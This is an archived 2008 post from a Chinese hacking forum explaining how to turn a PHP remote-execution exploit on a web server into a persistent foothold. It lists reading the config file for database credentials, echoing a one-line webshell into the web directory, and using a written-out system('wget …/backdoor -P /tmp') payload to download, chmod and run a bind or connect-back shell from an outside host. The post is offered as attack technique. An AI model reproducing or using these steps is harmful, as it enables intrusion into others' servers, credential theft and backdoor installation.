【3.A.S.T】网络安全爱好者's Archiver

黑客学习

2000gaobo 发表于 2008-7-24 17:20

[讨论]php remote exec to get a webshell?

[讨论]php remote exec to get a webshell?
文章作者:xi4oyu
信息来源:邪恶八进制信息安全团队([url=http://www.eviloctal.com/]www.eviloctal.com[/url])

逛milw0rm的在webapp板块可能经常会看到remote exec的php exploit

怎么通过这个获得webshell呢?

1.最传统的方法,读config获得mysql的帐号密码,再backup 一个shell出来

2.直接echo 写一个 一句话到web目录,具体的权限可以通过ls -l看看 需要注意转义字符的使用


3.要是目录都不能写呢?think,为什么我们非要php的webshell呢?可以直接用wget lynx之类的get一个perl 或者c 的bindshell或者connectback shell,执行之就可以了

第三点详细写下

"system('wget [url=http://xxxxxx.com/backdoor]http://xxxxxx.com/backdoor[/url] -P /tmp')"

wget的-P选项 指定保存的目录的,下载完你可以ls /tmp看下,一般有两个目录肯定可写的/tmp /usr/tmp推荐写/usr/tmp目录

恩,下载好了,chmod +x backdoor 一下,然后执行一下,当然如果是c写的,需要事先编译一下。
然后是bind 的自己连下,connectback的要事先监听好端口,视情况而定。


呵呵,木有技术含量阿,提供个思路罢了,大家讨论讨论其他方法
帖子68 精华[url=http://forum.eviloctal.com/digest.php?authorid=53997]0[/url] 积分3365 阅读权限100 性别男 在线时间180 小时 注册时间2006-6-19 最后登录2008-7-23 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=53997]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=鲜花预定&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]爱要怎么说出口[/url]

[url=http://forum.eviloctal.com/space-uid-11912.html]pt007[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img]

页: [1]

Powered by Discuz! Archiver 7.2  © 2001-2009 Comsenz Inc.